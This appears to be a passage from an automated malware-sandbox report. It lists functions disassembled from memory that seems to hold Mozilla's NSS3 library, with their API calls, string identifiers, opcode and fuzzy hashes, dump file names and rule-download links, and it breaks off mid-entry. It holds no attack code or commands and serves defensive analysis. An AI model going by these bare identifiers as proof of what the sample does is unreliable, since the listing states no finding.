                                                                                                                                                                                                                                                                                          • API ID: htonl
                                                                                                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                                                                                                          • API String ID: 2009864989-4108050209
                                                                                                                                                                                                                                                                                          • Opcode ID: 72f086b6c622e8809ee61c87a313858a0f16ffb1fb35e704949e26337a98bb0c
                                                                                                                                                                                                                                                                                          • Instruction ID: 5127ab1269aec69b5751914e765f0b0044d7c6e9b48f5b44789a45fabfbdff69
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72f086b6c622e8809ee61c87a313858a0f16ffb1fb35e704949e26337a98bb0c
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73511831A490798ADB358A7D88603FFFBB19B82314F194B3BC5A167AC1D234454687B4
                                                                                                                                                                                                                                                                                          Function 6C71EE70 Relevance: 3.2, APIs: 2, Instructions: 223COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C71F019
                                                                                                                                                                                                                                                                                          • PK11_GenerateRandom.NSS3(?,00000000), ref: 6C71F0F9
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ErrorGenerateK11_Random
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3009229198-0
                                                                                                                                                                                                                                                                                          • Opcode ID: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
                                                                                                                                                                                                                                                                                          • Instruction ID: b018b3e221c84c0224e628e55d3b7d2cda4699020843fc2c129786029ddeb592
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50919F71A0861A8FCB14CF68C9916AEB7F1FF85324F28462DD962A7FC1D730A905CB51
                                                                                                                                                                                                                                                                                          Function 6C742F70 Relevance: 3.1, APIs: 2, Instructions: 149COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE09A,00000000,00000000,?,6C767929), ref: 6C742FAC
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE040,00000000,00000000,?,6C767929), ref: 6C742FE0
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Error
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2619118453-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 299abd32317820de9a83068440e16b7b09e53f5a94e43d3cc2ce44fb0bd2774d
                                                                                                                                                                                                                                                                                          • Instruction ID: 27127f56d818e162cdd085d84858b15873bbd83b0a429177942031d200d815c6
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 299abd32317820de9a83068440e16b7b09e53f5a94e43d3cc2ce44fb0bd2774d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17512371A049118FD7148E59CA84B6A73B2FF4131AF29C379D90D9BB22C735E942CBC1
                                                                                                                                                                                                                                                                                          Function 6C68AC60 Relevance: 2.7, Strings: 2, Instructions: 181COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: winUnlock$winUnlockReadLock
                                                                                                                                                                                                                                                                                          • API String ID: 0-3432436631
                                                                                                                                                                                                                                                                                          • Opcode ID: 7f4b98f99c3f467c961b21e7a3095864527c8bdfe3f61ce44fa7028fcdcc7b5e
                                                                                                                                                                                                                                                                                          • Instruction ID: 72bac6e3b101ddb608b595ccf05474f61873c6562749301aaf7fe865c00c8988
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f4b98f99c3f467c961b21e7a3095864527c8bdfe3f61ce44fa7028fcdcc7b5e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB7181706052419FDB14DF28D884AABBBF5FF89318F14CA28FD4997242E730A985CBD5
                                                                                                                                                                                                                                                                                          Function 6C74ED70 Relevance: 1.7, APIs: 1, Instructions: 217memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6C74EE3D
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Alloc_ArenaUtil
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2062749931-0
                                                                                                                                                                                                                                                                                          • Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
                                                                                                                                                                                                                                                                                          • Instruction ID: b6f72dfb4ea0779014d8274d9e4c4642aa43da2956c77fff52010b16dbc2ec43
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2771D372E017098FE718CF59CA8066AF7F2BF88324F15862DD85697B92D730E940CB91
                                                                                                                                                                                                                                                                                          Function 6C675F30 Relevance: 1.6, APIs: 1, Instructions: 350stringCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000), ref: 6C676013
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: strcmp
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1004003707-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 64112edaec2c2b26e9f147a596ec1aa1b59a144c4b261702e5a8cbf59d17e648
                                                                                                                                                                                                                                                                                          • Instruction ID: d3c0fccf1df704fd3de78bf3b017145d6a4bd2590ad56a100d0bde704da03ebe
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64112edaec2c2b26e9f147a596ec1aa1b59a144c4b261702e5a8cbf59d17e648
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C3C14970B042068BDB24CF29C4607AAB7F2AF45318F248968D9A5D7B42D735EC41CBBC
                                                                                                                                                                                                                                                                                          Function 6C684DB0 Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: winUnlockReadLock
                                                                                                                                                                                                                                                                                          • API String ID: 0-4244601998
                                                                                                                                                                                                                                                                                          • Opcode ID: 7e1ead3038342be2060c7d367bb3e81bd055215515f69eed90e8d821a89e6cc6
                                                                                                                                                                                                                                                                                          • Instruction ID: 921c6659e7e3d7fa970dcf74aa20b6198ea9a117dffa1b87a38fb1ac6d935624
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e1ead3038342be2060c7d367bb3e81bd055215515f69eed90e8d821a89e6cc6
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1E14970A093408FDB55EF28D48865ABBF0FF8930CF518A2DF88997251E7709985CBD6
                                                                                                                                                                                                                                                                                          Function 6C805E60 Relevance: 1.4, APIs: 1, Instructions: 163COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C805B90: PR_Lock.NSS3(00010000,?,00000000,?,6C6EDF9B), ref: 6C805B9E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C805B90: PR_Unlock.NSS3 ref: 6C805BEA
                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000014,00000000,-000000D7,?,?,?,?,?,?,?,?,6C805E23,6C6EE154), ref: 6C805EBF
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: LockUnlockmemset
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1725470033-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 765870e01ac74a1a285e53e67be40ac57547b096a3347e8632765bb24f41ae14
                                                                                                                                                                                                                                                                                          • Instruction ID: 6f02106fe3f650fbc0774a11c31b09964791ad9170caa63d9e4987f9f0f9d696
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 765870e01ac74a1a285e53e67be40ac57547b096a3347e8632765bb24f41ae14
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4519D72E0021A8FDB28CF59C9815AEF7B2FF88314B19496DD815B7745D734A941CBA0
                                                                                                                                                                                                                                                                                          Function 6C7BDCD0 Relevance: .4, Instructions: 371COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 1f5dc615264c0fbf7cce97e88c4b0e5907c04258abd25c0c85fd14f87b7a86ce
                                                                                                                                                                                                                                                                                          • Instruction ID: 3ff29b3a5b34756281d9324e5d894f6ed017b36fdb80658fd54b85e32da3680e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f5dc615264c0fbf7cce97e88c4b0e5907c04258abd25c0c85fd14f87b7a86ce
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85F15D71A01205CFDB08CF18C5847AA77B2BF89318F2981B8E819AB745DB35ED42CBD5
                                                                                                                                                                                                                                                                                          Function 6C751DC0 Relevance: .3, Instructions: 345COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 5cf8dc963f7f79db549299581b4ae9ef430c02c880e9910e3ec163e0518b33a5
                                                                                                                                                                                                                                                                                          • Instruction ID: 232f3e13fba02c88cb4dae07ed98ddd65ee72f2b1147613602ff33f9671e5629
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5cf8dc963f7f79db549299581b4ae9ef430c02c880e9910e3ec163e0518b33a5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39D17B32E056568BEB018E18C9853DE7763AB85329F9E4328CC641B7C6CB7B9925C7D0
                                                                                                                                                                                                                                                                                          Function 6C6E8EA0 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 5d098d4ecedae29dd826950714d50e547bb99628abaa74c6dca5f80a957f0b6a
                                                                                                                                                                                                                                                                                          • Instruction ID: 57dc3d50a8f1657ee727d3356ff30442155f1320fcbd5e3dfa4fb15c2455f6c5
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d098d4ecedae29dd826950714d50e547bb99628abaa74c6dca5f80a957f0b6a
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5911EF32A0A2058BD714DF28D88475AB3A5BF8E35CF14426BD8058FA62D379D886C7C9
                                                                                                                                                                                                                                                                                          Function 6C7C0C40 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 05c9c085d94b04e6599dd63f03de7b186bc0099867fffb9857a3b814d7792993
                                                                                                                                                                                                                                                                                          • Instruction ID: 221c42c1f01cf57944cca96f1f2ba35284d0b17d36826a9779c8a31d7ff36fb1
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05c9c085d94b04e6599dd63f03de7b186bc0099867fffb9857a3b814d7792993
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7111C1B4704346CFCB20DF18C8806AA77A6FF85368F148479D8198B701DB71E806CBE1
                                                                                                                                                                                                                                                                                          Function 6C733FF0 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalEnterSectionUnlockValue$Error
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2275178025-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 71def87b2ebe00bdcb205e18f8a9229f5ce2c5f43f80bb6ca7e9088863b5b021
                                                                                                                                                                                                                                                                                          • Instruction ID: 16ee80504527dfa94a9f4258d51c1110d881d853570497fba1f3af8143c3e18f
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 71def87b2ebe00bdcb205e18f8a9229f5ce2c5f43f80bb6ca7e9088863b5b021
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CFF05E70A047598BCB20DF28C59159AB7F4EF09258F109629EC89AB701EB30AAD4C7D1
                                                                                                                                                                                                                                                                                          Function 6C7C0D60 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
